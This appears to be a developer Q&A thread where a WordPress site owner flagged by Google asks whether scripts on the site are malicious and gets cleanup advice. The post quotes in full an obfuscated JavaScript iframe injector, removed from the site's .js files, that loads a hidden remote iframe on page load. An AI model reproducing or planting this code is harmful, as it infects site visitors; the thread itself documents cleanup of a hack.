# Malware on website hxxp looks suspicious

Tags: javascript, php, wordpress, malware

Google has detected malicious file/malware on our website I checked it with 
redleg and some of these values are displayed yellow..

```
<div style=" display: none ;">
<input type="hidden" name="_wpcf7" value="41" />
<input type="hidden" name="_wpcf7_version" value="4.3" />
<input type="hidden" name="_wpcf7_locale" value="" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f41-o1" />
<input type="hidden" name="_wpnonce" value="649583a56e" />
  </div>
```

PS. I change our website links here to our website for security purpose and privacy

```
< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=52e4c650d67bb1484c4a926e5a0eccaf-2014.06.20'> < / sc?ript >
 < sc?ript type='text/javascript'>
 /* < ![CDATA[ */
 var _wpcf7 = {"loaderUrl":"http:\/\/ourwebsite.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sending ..."};
 /* ]]> */
 < / sc?ript >
< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=52e4c650d67bb1484c4a926e5a0eccaf'> < / sc?ript >
```

Can someone tell if these scripts look malicious ..

What I did is delete all this script from all my .js files

```
 /*dd58e691432e362d70bf5b7534f31b87*/
 var _0xacbd=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x73\x2E\x62\x61\x6C\x77\x35\x65\x7A\x76\x69\x63\x7A\x37\x68\x6B\x61\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xacbd[0]]=function(){function _0x78a6x1(_0x78a6x2,_0x78a6x3,_0x78a6x4){if(_0x78a6x4){var _0x78a6x5= new Date();_0x78a6x5[_0xacbd[2]](_0x78a6x5[_0xacbd[1]]()+_0x78a6x4);};if(_0x78a6x2&&_0x78a6x3){document[_0xacbd[3]]=_0x78a6x2+_0xacbd[4]+_0x78a6x3+(_0x78a6x4?_0xacbd[5]+_0x78a6x5[_0xacbd[6]]():_0xacbd[7])}else {return false};}function _0x78a6x6(_0x78a6x2){var _0x78a6x3= new RegExp(_0x78a6x2+_0xacbd[8]);var _0x78a6x4=_0x78a6x3[_0xacbd[9]](document[_0xacbd[3]]);if(_0x78a6x4){_0x78a6x4=_0x78a6x4[0][_0xacbd[10]](_0xacbd[4])}else {return false};return _0x78a6x4[1]?_0x78a6x4[1]:false;}var _0x78a6x7=_0x78a6x6(_0xacbd[11]);if(_0x78a6x7!=_0xacbd[12]){_0x78a6x1(_0xacbd[11],_0xacbd[12],1);var _0x78a6x8=document[_0xacbd[14]](_0xacbd[13]);var _0x78a6x9=983755;var _0x78a6xa=_0xacbd[15]+_0x78a6x9+_0xacbd[16];_0x78a6x8[_0xacbd[17]]=_0xacbd[18]+_0x78a6xa+_0xacbd[19];document[_0xacbd[21]][_0xacbd[20]](_0x78a6x8);};};
 /*dd58e691432e362d70bf5b7534f31b87*/
```

Comment: your website link please

Comment: The first two are from the contact form 7 plugin, nothing to worry about. The third is a different thing. Follow http://codex.wordpress.org/FAQ_My_site_was_hacked

Comment: I edited the post, of what I have done so far thanks

Comment: hi Gerald unfortunately requesting a cleanup would cost something, is there any free malware cleaner?

Comment: @FatalError it's not "malware", it's a Javascript Iframe Trojan. Searching Google for a free malware cleanup will give you something that will take ages and not clean the problem, You need an ***anti-virus*** on your server space.

Comment: @FatalError I'm usually using Wordfence WordPress plugin to scan my clients sites. It's good enough as free plugin.

Comment: yup I already have wordfence, I used Anti-Malware Security and Brute-Force Firewall and it works fine now, https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fcondorpossolutions.com&ref_sel=GSP2&ua_sel=ff&fs=1

Comment: how about the hxxp? should I do something about it?

Comment: @Martin Hi can you recommend a good free anti virus?

Comment: in short no. My antyi-virus is not free and I question the quality of free ones, (plus they seem to overload browsers with extra nav bars). It's an investment to buy a good one. I use ESet. It's pretty hot. As for your site, you need to check *how* the code got onto your site, as doing an anti-virus scan is shutting the door after the horse has bolted (ie solving the problem not the cause). I can't reload this page as doing so means I need to turn off my AV. For anti Malware use *Malware Bytes* that's got a very good rep. Judging by Silvers answer what about installing the free Avast AV?

Answer (score 1):

My Antivirus (ESet Endpoint Security 5.0.2) detects the above javascript `var` block code as a Trojan virus and refuses to load this page while my antivirus is enabled. That's a pretty good sign this is indeed a bad code-block.

So to answer your query, yes, the code you posted is indeed malicious.

Answer (score 0):

Wow, even my free Avast detects a malware by just reading your question.

Answer (score 0):

I downloaded  Anti-Malware Security and Brute-Force Firewall, now the threat disappear although there is still remaining, but on other url, which is

but these two only redirect the page to the main page..

PS. I have backups that is stored on the FTP before the cleanup should I delete them as well? or is it fine as long as they aren't running

Comment: I also tried clamAV but it only scans infected files from my mail directory should I delete em?

Comment: If there's a virus in it, delete it. Often things like Thunderbird will contain virus elements that can never be used as the email the code blocks are associated with will have been deleted but the code itself is left over. It is recommended to use SFTP rather than straight FTP, which is easy to hack.